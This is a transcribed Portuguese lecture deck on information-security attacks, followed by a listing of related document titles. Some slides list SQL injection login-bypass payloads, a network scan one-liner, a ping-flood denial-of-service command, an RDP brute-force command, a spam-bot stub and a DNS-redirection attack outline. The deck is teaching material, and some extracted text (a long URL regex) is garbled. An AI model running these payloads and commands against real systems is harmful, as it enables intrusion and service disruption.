Elementos de Segurança da Informação em ambientes heterogêneos

Tamanho: px
Começar a partir da página:

Download "Elementos de Segurança da Informação em ambientes heterogêneos"

Transcrição

1 Elementos de Segurança da Informação em ambientes heterogêneos IBM IT Specialist University Ambassador 11/02/06

2 Conceito A melhor maneira de se conhecer as armas de nosso oponente é usando-as! O feito de Alan Turing 2

3 O que são ambientes heterogêneos Repositórios de informações que podem ser acessados pelos seguintes meios: Meio físico Telefonia Rádio Rede 3

4 O que vamos caçar hoje? (As intenções de um ataque) Indisponibilizar um servidor Desfigurar uma página Desviar recursos computacionais/rede Redirecionar tráfego Roubar dados Modificar dados 4

5 Escolham suas armas Brute-force DoS Hardware Exploits Software Exploits DNS flood SQL injection Remote file inclusion Buffer overflow Engenharia social Shell code Ambientes Remoto Local 5

6 Como o campo de batalha foi formado? Guerra-Fria, Corrida Espacial e Internet Telefonia A necessidade de se computar dados em grande escala em Rede (O Unix nasce) A necessidade de se computar dados em pequena escala (O Microcomputador nasce) As Lições do IBM PC (Uma plataforma única, patenteada que se tornou um padrão livre de hardware independente de software.) As Lições da Apple (Uma plataforma única, patenteada, um conjunto inovador de hadware e software) As lições da Microsoft e o novo modelo de negócios da Micro-Computação (Vendas baseadas em licenças de uso e patentes em software) O Unix volta a cena A necessidade de se computar dados em pequena escala em Rede! O novo horizonte 6

7 O novo horizonte O surgimento do GNU (Richard Stallman) A necessidade de um kernel O surgimento da Internet (Tim Berners-Lee) O surgimento do Linux (Linus Torvalds) A Ética Hacker e o Open-Source (Eric Raymond) Catedral e Bazar A liberdade incondicional sobre a propriedade A necessidade de novas linguagems (Perl, Java, Python, PHP) *Ver timeline das linguagens 7

8 A Cultura Hacker e a Terceira Onda A liberdade incondicional sobre a propriedade O livre acesso a informação O trabalho colaborativo entre quem tem algo a agregar A estratégia Open-Source chega aos grandes players: IBM, SUN, Oracle, HP, Novell O modelo de negócios off-shore O home-office Os direitos autorais Copyright law is totally out of date. It is a Gutenberg artifact. Since it is a reactive process, it will probably have to break down completely before it is corrected. Nicholas Negroponte {Being Digital} 8

9 Rastrear Farejar e Monitorar nmap (nmap -v -ss -O /16) fping perl -e ' for (1..254) {print $_\n } ' fping -a -q 2>/dev/null nessus scanlogd ethereal ethercap cain 9

10 SQL Injection Nada mais simples que isso: SELECT fieldlist FROM table WHERE id = 23 OR 1=1 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. /index.asp, line 5 admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a 10

11 Remote file injection vikov.htm 11

12 Exemplo de expressão regular (?: -)*[a-za-z\d])?)\. )*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\. (?:\d+) ){3}))(?::(?:\d+))?)(?:/(?:(?:(?:(?:[a-zA-Z\d$\-_.+!*'(),] (?:%[a-fa-f \d]{2})) (?:% [a-fa-f\d]{ 2})) (?:%[a-fa-f\d]{ 2})) (?:ftp://(?:(?:(?:(?:(?:[a-za- Z\d$\-_.+!*'(),] (? :%[a-fa-f\d]{2})) [;?&=])*)(?::(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a- fa-f\d]{2})) - )*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d])?)) (?:(? :\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))?))(?:/ (?:(?:(?:(?:[a-za-z\d$\-_.+! *'(),] (?:%[a-fa-f\d]{2})) (?:%[a-fa-f\d]{2})) (?:;type=[aidaid])?)?) (?:news:(?: (?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) Z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[ a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)){3}))) (?:[a-za-z](?:[a-za-z\d] [_.+-])*) \*)) (?:nntp://(?:(?:(?:(?:(?:[a-za-z\d](?:(?:[ a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d ])?)) (?:(?:\d+) (?:\.(?:\d+)){3}))(?::(?:\d+))?)/(?:[a-za-z](?:[a-za-z \d] [_.+-])*)(?:/(?:\d+))?) (?:telnet://(?:(?:(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[afa-f\d]{2})) [;?&=])*)(?::(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) -za- Z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -)*[a-za-z\d] )?)) (?:(?:\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))?))/?) (?:gopher://(?:(?: (?:(?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?: (?:[a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)){3}))(?:: (?:\d+ (?:%[a-fa-f\d]{2}))(?:(?:(?:[ (?:%[a-fa-f\d]{2}))*)(?:%09 (?:(?:(?:[a-za -Z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) \-_.+!*'(),;/?:@&=] (?:%[a-fa-f\d]{2})) *))?)?)?)?) (?:wais://(?:(?:(?: (?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?: [a-za-z\d] -)*[a-za-z\d])?)) (?: (?:\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))? )/(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2}))*)(?:(?:/(?:(?:[a-za -Z\d$\-_.+!*'(),] (?:%[a-fa- F\d]{2}))*)/(?:(?:[a-zA-Z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2}))*)) \?(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d] {2})) (?:mailto:(?:(?:[a-za-z\d$\-_.+!*'(),;/?:@&=] (?:% [a-fa-f\d]{2}))+)) (?:file://(?:(?:(?:(?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za- Z\d])?)\.)*(?:[a-zA-Z](?:(?:[a-zA-Z\d] -)*[a-za-z\d])?)) (?: (?:\d+)(?:\.(?:\d+)){3})) localhost)?/(?:(?:(?:(?:[a-za-z\d$\-_.+!*'(),] (?:% [a-fa-f\d]{2})) (?:%[a-fa-f\d]{2})) (?:prospero://(?:(?:(?:(?:(?:[a-za-z \d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?:[a-za-z\d] -) *[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)){3}))(?::(?:\d+))?)/(?:(?:(?: (? :[a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) (?:(?:[ a-za-z\d$\-_.+!*'(),] (?:%[a-fa-f\d]{2})) $\-_.+!*'(),] (?:%[a-fa-f\d]{2})) (?:ldap:// (?:(?:(?:(?: (?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za-z\d])?)\.)*(?:[a-za-z](?:(?: [a-za-z\d] -)*[a-za-z\d])?)) (?:(?:\d+)(?:\.(?:\d+)) {3}))(?::(?:\d+))? ))?/(?:(?:(?:(?:(?:(?:(?:[a-za-z\d] %(?:3\d [46][a-fA-F\d] [57][Aa\d]) ) (?:%20))+ (?:OID oid)\.(?:(?:\d+)(?:\. (?:\d+))*))(?:(?:%0[aa])?(?:%2 0)*)=(?:(?:%0[Aa])?(?:%20)*))?(?:(?:[a-zA-Z\d$\-_.+!*'(),] (?:%[a-fa-f \d]{2}))*))(?:(?:(?:%0[aa])? (?:%20)*)\+(?:(?:%0[Aa])?(?:%20)*)(?:(?:(? :(?:(?:[a-za-z\d] %(?:3\d [46][a-fA-F\d] [57][Aa\d])) (?:%20))+ (?:OID oid)\.(?: (?:\d+)/])+)))?)) )?) (?:nfs:(?:(?://(?:(?:(?:(?:(?:[a-za-z\d](?:(?:[a-za-z\d] -)*[a-za- Z\d])?)\.)*(?:[a-zA-Z](?:(?:[a-zA-Z\d] -)*[a-za-a- F\d]{2}) [:@&=+])*))*)?)))... 12

13 SPAM bot public class attack { } public static void main(string[] args) { String url = " ne@none.com"; } doitagain doit = new doitagain(5,url); doit.init(); Nome: Mensagem: Submit 13

14 DoS Objetivo: Esgotar a capacidade de entrega de um servidor ping -f -s n <host> 14

15 Exemplo de Brute Force rdesktop -u Administrator -p words.txt <host> 15

16 Redirecionamento de DNS Rasterar portas Encontrar vítima (Access Point) Capturar os dados Explorar falha Mudar DNS primário Mudar os hosts internos Logar tráfego do DNS primário Analisar logs e escolher alvo 16

17 WiFi e a onda de insegurança Decriptar WEP Rastrear: Kismet Netstumbler 17

18 A versatilidade do kernel emacs gzip nano Hardware I/O Processador bash Memória gcc ncurses 18

19 Meu ambiente de testes: Seu ambiente de testes deve ser semelhante ao do seu oponente 19

20 Considerações finais Antes de tudo, seja um bom programador, Conheça bem SQL, Domine infraestrutura de redes ethernet, saiba montar e administrar seus próprios servidores Linux. 20

21 Dúvidas? 11/02/06

22 Thank You! 11/02/06

(In)Segurança Virtual. Técnicas de Ataque e Defesa

(In)Segurança Virtual. Técnicas de Ataque e Defesa (In)Segurança Virtual Técnicas de Ataque e Defesa Expotec 2009 IFRN- Campus Mossoró Nícholas André - nicholasandreoliveira9@gmail.com www.iotecnologia.com.br Mossoró-RN Setembro-2009 O que é preciso! Engenharia

Leia mais

SUMÁRIO. Cercando a instituição. 1 Perfil... 7 O que é perfil?... 8 Por que o perfil é necessário?... 9

SUMÁRIO. Cercando a instituição. 1 Perfil... 7 O que é perfil?... 8 Por que o perfil é necessário?... 9 SUMÁRIO Parte I Cercando a instituição Estudo de caso............................................. 2 ETUQDA É tudo uma questão de anonimato........................ 2 A-Tor-mentando as pessoas do bem...............................

Leia mais

Martin Vincent Bloedorn. GNU/Linux

Martin Vincent Bloedorn. GNU/Linux Martin Vincent Bloedorn Índice Motivação o que é? Breve história SO e abstrações GNU Origens Liberdade e escolha GNU O começo GNU GPL Free Software Foundation Desenvolvimentos Algo faltando... Linus e

Leia mais

Noções de Software. André Aziz (andreaziz.ufrpe@gmail.com) Francielle Santos (francielle.ufrpe@gmail.com)

Noções de Software. André Aziz (andreaziz.ufrpe@gmail.com) Francielle Santos (francielle.ufrpe@gmail.com) Noções de Software André Aziz (andreaziz.ufrpe@gmail.com) Francielle Santos (francielle.ufrpe@gmail.com) Noções de Software; Sistemas Operacionais: Evolução; Conceitos Básicos; Tipos; Exemplos. DEINFO/UFRPE

Leia mais

Software Livre, Distribuições GNU/Linux e Telecomunicações

Software Livre, Distribuições GNU/Linux e Telecomunicações Álvaro Justen (a.k.a. Turicas) Apresentação Graduando em Engª de Telecomunicações - UFF Pesquisa: IF-UFF: Física computacional/estatística Midiacom: Redes sem fio Experiência > 7 anos em GNU/Linux Sócio-fundador

Leia mais

CC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o Documentário RevolutionOS

CC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o Documentário RevolutionOS SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL FACULDADE DE TECNOLOGIA SENAC PELOTAS CC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o

Leia mais

26/09/2015. Windows Linux Mac OS/X IBM OS/2 Sun Solaris Google Android. MS-DOS Outros... O QUE É? SISTEMAS OPERACIONAIS

26/09/2015. Windows Linux Mac OS/X IBM OS/2 Sun Solaris Google Android. MS-DOS Outros... O QUE É? SISTEMAS OPERACIONAIS O QUE É? SISTEMAS OPERACIONAIS Um programa que vai gerenciar os recursos do seu computador, memória, processador, agenda de tarefas, segurança das transações, autenticação de usuários. Prof. André Aparecido

Leia mais

Prof. Jefferson Costa www.jeffersoncosta.com.br

Prof. Jefferson Costa www.jeffersoncosta.com.br O que é Linux? Open Source (software Livre) é a mesma coisa que Software Gratuito? Quem é melhor? Qual é mais seguro? Encontramos muitas diferenças entre as distribuições de Linux? Posso desinstalar o

Leia mais

Ameaças, riscos e vulnerabilidades Cont. Objetivos

Ameaças, riscos e vulnerabilidades Cont. Objetivos Ameaças, riscos e vulnerabilidades Cont. Prof. Esp. Anderson Maia E-mail: tecnologo.maia@gmail.com Objetivos entender a definição dos termos hacker, cracker e engenharia social; compreender a anatomia

Leia mais

A t i v i s t a s d o S o f t w a r e L i v r e

A t i v i s t a s d o S o f t w a r e L i v r e GRUPO Badio Gomes Rafael Neves Roger Luis Wilson Junior Indice Eric Raymond Bruce Perens Richard M. Stallman Linus Torvalds Ativistas brasileiros A t i v i s t a d o S o f t w a r e L i v r e Eric Raymond

Leia mais

Universidade Federal de Goiás. Alexandre Ferreira de Melo CERCOMP / UFG

Universidade Federal de Goiás. Alexandre Ferreira de Melo CERCOMP / UFG Universidade Federal de Goiás Ubuntu Desktop Alexandre Ferreira de Melo CERCOMP / UFG Conpeex / 2010 Agenda Introdução Conceitos Categorias de Software História do Linux Arquitetura do Linux Ubuntu Projeto

Leia mais

Oficina de ferramentas de Gerência para Redes em Linux. Prof. Jefferson Santiago

Oficina de ferramentas de Gerência para Redes em Linux. Prof. Jefferson Santiago Oficina de ferramentas de Gerência para Redes em Linux Prof. Jefferson Santiago Apresentação Qual seu nome? Já possui experiência na área? Questionário avaliativo Acesse: http://goo.gl/forms/4rfaomufim

Leia mais

CC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o Documentário RevolutionOS

CC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o Documentário RevolutionOS SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL FACULDADE DE TECNOLOGIA SENAC PELOTAS CC Montagem e manutenção de hardware Docente: Nataniel Vieira 1 sem Técnico em Informática Roteiro 06: Atividade sobre o

Leia mais

Manifesto Software Livre

Manifesto Software Livre Manifesto Software Livre Histórico iniciou com a elaboração de um documento denominado: " Manifesto GNU " por Richard Stallman 1.984; marco histórico do surgimento de uma nova forma de criação de Software;

Leia mais

Software de sistema Software aplicativo

Software de sistema Software aplicativo SOFTWARE O que é Software? Software, logicial ou programa de computador é uma sequência de instruções a serem seguidas e/ou executadas, na manipulação, redireccionamento ou modificação de um dado/informação

Leia mais

SISTEMA OPERACIONAL & SOFTWARE LIVRE

SISTEMA OPERACIONAL & SOFTWARE LIVRE Curso Técnico em Redes de Computadores Disciplina de Sistemas Operacionais Livres SISTEMA OPERACIONAL & SOFTWARE LIVRE Professora: Juliana Cristina dos Santos E-mail: professora@julianacristina.com Site:

Leia mais

Linux em Portugal e Caixa Mágica Paulo Trezentos ADETTI / Caixa Mágica

Linux em Portugal e Caixa Mágica Paulo Trezentos ADETTI / Caixa Mágica Linux em Portugal e Caixa Mágica Paulo Trezentos ADETTI / Caixa Mágica Semana da Informática - Escola Secundária Filipa de Vilhena 27 de Abril de 2004 - Porto Agenda Situação Actual da Utilização Linux

Leia mais

Segurança em Sistemas Web. Addson A. Costa

Segurança em Sistemas Web. Addson A. Costa Segurança em Sistemas Web Addson A. Costa Spoofing de formulários Spoofing consiste em falsificação, por exemplo, na área de redes um computador pode roubar o IP de outro e assim fazer-se passar por ele.

Leia mais

Serviços e soluções baseadas em Software Livre. Omega Tecnologia

Serviços e soluções baseadas em Software Livre. Omega Tecnologia Serviços e soluções baseadas em Software Livre Omega Tecnologia Agenda Sobre a Omega Tecnologia As tendências da TI como Serviço Vantagens do uso de soluções livres As soluções da Omega baseadas em Software

Leia mais

Criando scanner para FreeSSHd vulnerável ao exploit do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t

Criando scanner para FreeSSHd vulnerável ao exploit do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t Criando scanner para FreeSSHd vulnerável ao exploit do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t São Paulo 2010 Nome: Fernando Henrique Mengali de Souza Contato: fer_henrick@hotmail.com Linguagem de

Leia mais

MONITORAMENTO DO AMBIENTE TECNOLÓGICO FoccoMONITOR

MONITORAMENTO DO AMBIENTE TECNOLÓGICO FoccoMONITOR MONITORAMENTO DO AMBIENTE TECNOLÓGICO FoccoMONITOR Fevereiro/2012 Índice APRESENTAÇÃO... 3 O QUE É ESSE SERVIÇO?... 3 POR QUE MONITORAR?... 3 QUAL A ABRANGÊNCIA?... 4 MÉTRICAS... 4 PERÍODO DO MONITORAMENTO...

Leia mais

UNICE Ensino Superior Linguagem de Programação Ambiente Cliente Servidor.

UNICE Ensino Superior Linguagem de Programação Ambiente Cliente Servidor. UNICE Ensino Superior Linguagem de Programação Ambiente Cliente Servidor. Modelo Cliente/Servidor Por HIARLY ALVES Fortaleza - CE Apresentação. O mais famoso tipo de arquitetura utilizada em redes de computadores

Leia mais

Modo Básico, passando por senhas em sites

Modo Básico, passando por senhas em sites A Injeção SQL www.invasao.com.br Modo Básico, passando por senhas em sites Hoje em dia é uma prática comum os sites pedirem um cadastro do visitante, e criar-lhe um login, dando acesso a áreas restritas

Leia mais

Criando scanner para Oracle vulneráveis a exploits do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t

Criando scanner para Oracle vulneráveis a exploits do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t Criando scanner para Oracle vulneráveis a exploits do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t São Paulo 2010 Nome: Fernando Henrique Mengali de Souza Contato: fer_henrick@hotmail.com Linguagem de

Leia mais

Sistema Operacional. História Sistema Operacional 1. QI Escolas e Faculdades Apostila de Linux

Sistema Operacional. História Sistema Operacional 1. QI Escolas e Faculdades Apostila de Linux 4 Capítulo 1 Sistema Operacional É uma coleção de programas que inicializa hardwares, fornece rotinas básicas para controle de dispositivos, mantém a integridade de um sistema. Um sistema operacional de

Leia mais

Unidade 1: Sistema Operativo Linux

Unidade 1: Sistema Operativo Linux Unidade 1: Sistema Operativo Linux 1 2 Sistema Operativo Linux Objectivos desta unidade Caracterizar o sistema operativo Linux Saber como obter documentação e apoio sobre a instalação e utilização do Linux

Leia mais

Segredos do Hacker Ético

Segredos do Hacker Ético Marcos Flávio Araújo Assunção Segredos do Hacker Ético 2 a Edição Visual Books Sumário Prefácio... 21 Introdução... 23 1 Entendendo o Assunto... 25 1.1 Bem-vindo ao Obscuro Mundo da Segurança Digital...25

Leia mais

GR1NCH/Rêner (gr1nch@dclabs.com)

GR1NCH/Rêner (gr1nch@dclabs.com) GR1NCH/Rêner (gr1nch@dclabs.com) Agenda O que seria um ataque de SQL Injection. As falhas de um administrador. O código ASP vulnerável. O ponto de vista do invasor e as etapas de um ataque: Levantamento

Leia mais

Agente local Aranda GNU/Linux. [Manual Instalación] Todos los derechos reservados Aranda Software www.arandasoft.com [1]

Agente local Aranda GNU/Linux. [Manual Instalación] Todos los derechos reservados Aranda Software www.arandasoft.com [1] Todos los derechos reservados Aranda Software www.arandasoft.com [1] Introdução O Agente Aranda para sistemas Linux se encarrega de coletar as seguintes informações em cada uma das estações de trabalho

Leia mais

SOFTWARE LIVRE. Fábio Rodrigo Barby Informática - IFPR

SOFTWARE LIVRE. Fábio Rodrigo Barby Informática - IFPR SOFTWARE LIVRE Fábio Rodrigo Barby Informática - IFPR Software Livre x Software Proprietário Software Proprietário O que é? Copyright; Cópia é proibida; Redistribuição é proibida; Modificação é proibida;

Leia mais

O modelo Bazar de Produção de Softwares. O caso das Comunidades Virtuais de Software livre.

O modelo Bazar de Produção de Softwares. O caso das Comunidades Virtuais de Software livre. O modelo Bazar de Produção de Softwares O caso das Comunidades Virtuais de Software livre. Por Vicente Aguiar Fonte: Lucas Rocha Feced/2005 Sobre esta apresentação 2005 Lucas Rocha > lucasr@gnome.org

Leia mais

Linux em Portugal Visão Caixa Mágica

Linux em Portugal Visão Caixa Mágica Linux em Portugal Visão Caixa Mágica Paulo Trezentos Paulo.Trezentos@caixamagica.pt - Investigador ADETTI - Responsável Caixa Mágica Visão... Visão Inovação Questão? 2 Empresas GrupoPT Indústria Telco

Leia mais

Sistemas Distribuídos

Sistemas Distribuídos Sistemas Distribuídos LICENCIATURA EM COMPUTAÇÃO Prof. Adriano Avelar Site: www.adrianoavelar.com Email: eam.avelar@gmail.com Relembrando... Mecanismos de Comunicação Middleware Cenário em uma rede Local

Leia mais

Apresentação. Objetivo. Dados Principais. Tecnologia Abordada Linux

Apresentação. Objetivo. Dados Principais. Tecnologia Abordada Linux Apresentação Dados Principais Objetivo Este curso fornecerá o conhecimento técnico e administrativo necessário ao desenvolvimento, administração e manutenção de estações e servidores baseados na plataforma

Leia mais

Software Livre em Empresas. Cesar Bezerra Teixeira

Software Livre em Empresas. Cesar Bezerra Teixeira Software Livre em Empresas Cesar Bezerra Teixeira 2004 Objetivo Apresentar tópicos diversos, para implantação de uma política de utilização de software livre, em empresas. Cesar Bezerra Teixeira 2 Sumário

Leia mais

Senha Admin. Nessa tela, você poderá trocar a senha do administrador para obter acesso ao NSControl. Inicialização

Senha Admin. Nessa tela, você poderá trocar a senha do administrador para obter acesso ao NSControl. Inicialização Manual do Nscontrol Principal Senha Admin Nessa tela, você poderá trocar a senha do administrador para obter acesso ao NSControl. Inicialização Aqui, você poderá selecionar quais programas você quer que

Leia mais

Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com

Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com UNIVERSIDADE FEDERAL DO PAMPA CAMPUS BAGÉ ENGENHARIA DE COMPUTAÇÃO Segurança em aplicações web: pequenas ideias, grandes resultados alexcamargoweb@gmail.com Sobre o professor Formação acadêmica: Bacharel

Leia mais

Sistema Operativo Linux

Sistema Operativo Linux Sistema Operativo Linux Linux É um sistema operativo da família UNIX, desenvolvido colaborativamente através da internet. É um software livre ou open source, com o código fonte disponível em www.kernel.org

Leia mais

Desenvolvendo MetasploitScanHTTP.pl para falhas HTTPS vulneráveis ao Metasploit. Inj3cti0n P4ck3t

Desenvolvendo MetasploitScanHTTP.pl para falhas HTTPS vulneráveis ao Metasploit. Inj3cti0n P4ck3t Desenvolvendo MetasploitScanHTTP.pl para falhas HTTPS vulneráveis ao Metasploit Inj3cti0n P4ck3t São Paulo 2010 Nome: Fernando Henrique Mengali de Souza Contato: fer_henrick@hotmail.com Linguagem de Programação:

Leia mais

Instruções de Instalação do IBM SPSS Modeler (Licença de Usuário Autorizado) IBM

Instruções de Instalação do IBM SPSS Modeler (Licença de Usuário Autorizado) IBM Instruções de Instalação do IBM SPSS Modeler (Licença de Usuário Autorizado) IBM Índice Instruções de Instalação....... 1 Requisitos do sistema........... 1 Código de autorização.......... 1 Instalando...............

Leia mais

Acesso a banco de dados

Acesso a banco de dados Acesso a banco de dados 1. Crie uma pasta chamada AcessoBD com as seguintes subpastas: Aplicativos, Drivers, AcessoMSACCESS, AcessoMySQL e AcessoSQLSERVER Exemplo 1: MS ACCESS 1. Crie um banco de dados

Leia mais

O modelo Bazar de Produção de Softwares. O caso das Comunidades Virtuais de Software livre.

O modelo Bazar de Produção de Softwares. O caso das Comunidades Virtuais de Software livre. O modelo Bazar de Produção de Softwares O caso das Comunidades Virtuais de Software livre. Por Vicente Aguiar Fonte: Lucas Rocha Feced/2005 Sobre esta apresentação 2008 Vicente Aguiar

Leia mais

Generated by Foxit PDF Creator Foxit Software http://www.foxitsoftware.com For evaluation only. Capitulo 1

Generated by Foxit PDF Creator Foxit Software http://www.foxitsoftware.com For evaluation only. Capitulo 1 Capitulo 1 Montagem de duas pequenas redes com a mesma estrutura. Uma é comandada por um servidor Windows e outra por um servidor linux, os computadores clientes têm o Windows xp Professional instalados.

Leia mais

Coordenação de Segurança cooseg@celepar.pr.gov.br. 1 de 37

Coordenação de Segurança cooseg@celepar.pr.gov.br. 1 de 37 Implementando Segurança em Software Livre Coordenação de Segurança cooseg@celepar.pr.gov.br 1 de 37 Internet Incidente de Segurança Ataques Ameaças Vulnerabilidades Riscos Estatísticas Agenda Políticas

Leia mais

O Windows é um software de sistema, que permite ao utilizador interagir com o computador e com os seus periféricos.

O Windows é um software de sistema, que permite ao utilizador interagir com o computador e com os seus periféricos. Sistema Operativo Windows - Ambiente de trabalho - Janelas - Atalhos - Programas - Gestão de pastas e ficheiros - Menu iniciar O Windows é um software de sistema, que permite ao utilizador interagir com

Leia mais

1 / 6. Cartilha O ABC do Software Livre. O que é PcLivre?

1 / 6. Cartilha O ABC do Software Livre. O que é PcLivre? 1 / 6 Cartilha O ABC do Software Livre O que é PcLivre? O PC Livre é um projeto de iniciativa do PSL-Brasil, coordenado por voluntários e operado por vários parceiros que apoiam a iniciação de novos usuários

Leia mais

ICC - Aula 15 Sistemas Operacionais e Redes

ICC - Aula 15 Sistemas Operacionais e Redes February 2, 2015 O Sistema Operacional é o software basico que controla um computador É o primeiro software 1 a ser executado pelo computador e o ultimo (shutdown) Funcionalidades e desempenho 1 Na realidade,

Leia mais

Segurança em Aplicações Web Metodologia OWASP

Segurança em Aplicações Web Metodologia OWASP Segurança em Aplicações Web Metodologia OWASP Weekly Seminar Lucas Vinícius da Rosa Laboratório de Segurança em Computação () Universidade Federal de Santa Catarina (UFSC) lvrosa@inf.ufsc.br 2012 Sumário

Leia mais

Laboratório de Banco de Dados Aula 1 Acesso a Banco de Dados. Prof. Josenildo Silva jcsilva@ifma.edu.br

Laboratório de Banco de Dados Aula 1 Acesso a Banco de Dados. Prof. Josenildo Silva jcsilva@ifma.edu.br Laboratório de Banco de Dados Aula 1 Acesso a Banco de Dados Prof. Josenildo Silva jcsilva@ifma.edu.br Introdução O JDBC (Java Database Connectivity) foi criado com o intuito de fornecer aos programadores

Leia mais

Uso de Software Livre na Universidade

Uso de Software Livre na Universidade Uso de Software Livre na Universidade Diego Starling Fonseca Guilherme da Silva Nascimento Gustavo Henrique do Nascimento Pereira Luiz Henrique Bueno Byrro Marcelo Luiz Lacerda Esteves Rodrigo Alvaro da

Leia mais

Gerência de Redes de Computadores. 05 Gerência de Hospedeiros (Hosts)

Gerência de Redes de Computadores. 05 Gerência de Hospedeiros (Hosts) Gerência de Redes de Computadores 05 Gerência de Hospedeiros (Hosts) UFCG / DSC / JPS * 05 GERÊNCIA DE HOSPEDEIROS 1 TIPOS DE HOSPEDEIROS DOIS TIPOS DE HOSPEDEIROS o Servidores o Estações Clientes HÁ GRANDE

Leia mais

JDBC DRIVER. Objetivo: Possibilitar aplicações não Zim de se conectar a um banco de dados Zim utilizando as normas JDBC.

JDBC DRIVER. Objetivo: Possibilitar aplicações não Zim de se conectar a um banco de dados Zim utilizando as normas JDBC. Objetivo: Possibilitar aplicações não Zim de se conectar a um banco de dados Zim utilizando as normas JDBC. Requisitos para usar o driver JDBC Do lado do cliente: O driver JDBC Do lado do servidor: A base

Leia mais

INTERNET. George Gomes Cabral

INTERNET. George Gomes Cabral INTERNET George Gomes Cabral HISTÓRICO 1966 Um pesquisador da Agência de Projetos Avançados de Pesquisa (Arpa) chamado Bob Taylor consegue US$ 1 milhão para tocar um projeto de interligação dos laboratórios

Leia mais

Ferramentas de Administração. PostgreSQL

Ferramentas de Administração. PostgreSQL Ferramentas de Administração ao SGBD PostgreSQL Diego Rivera Tavares de Araújo diegoriverata@gmail.com Introdução Mas o que é PostgreSQL? Introdução as ferramentas O PostgreSQL pode ser acessado a partir

Leia mais

Open - audit Ferramenta para gerenc iamento de rede

Open - audit Ferramenta para gerenc iamento de rede Faculdade de Tecnologia SENAC GO Ges t ã o de T ecnologia de Informaç ão M ód ulo IV - Matutin o Open - audit Ferramenta para gerenc iamento de rede Alunos : Gab riel da Silva, Matheus Pereira, Rome ro

Leia mais

Aula 1 Acesso a Banco de Dados

Aula 1 Acesso a Banco de Dados Laboratório de Banco de Dados Aula 1 Acesso a Banco de Dados Prof. Josenildo Silva jcsilva@ifma.edu.br Introdução O JDBC (Java Database Connectivity) foi criado com o intuito de fornecer aos programadores

Leia mais

Instalando o WordPress em localhost

Instalando o WordPress em localhost Instalando o WordPress em localhost WordPress sem Mistério LEE ARAUJO htto://wordpresssemmisterio.com.br Sumário Instalando o WordPress em Localhost... 2 O Servidor web... 3 Iniciando o servidor... 6 Criação

Leia mais

Introdução Software Livre Projeto GNU/Linux Software Livre vs Software Proprietário Liberdade para todos. Software Livre. Grupo 5

Introdução Software Livre Projeto GNU/Linux Software Livre vs Software Proprietário Liberdade para todos. Software Livre. Grupo 5 Introdução Projeto GNU/Linux vs Software Proprietário Liberdade para todos Tronco Inicial Universidade Federal de Alagoas - UFAL- Arapiraca 29 de Março 2012 Introdução Projeto GNU/Linux vs Software Proprietário

Leia mais

http://aurelio.net/vim/vim-basico.txt Entrar neste site/arquivo e estudar esse aplicativo Prof. Ricardo César de Carvalho

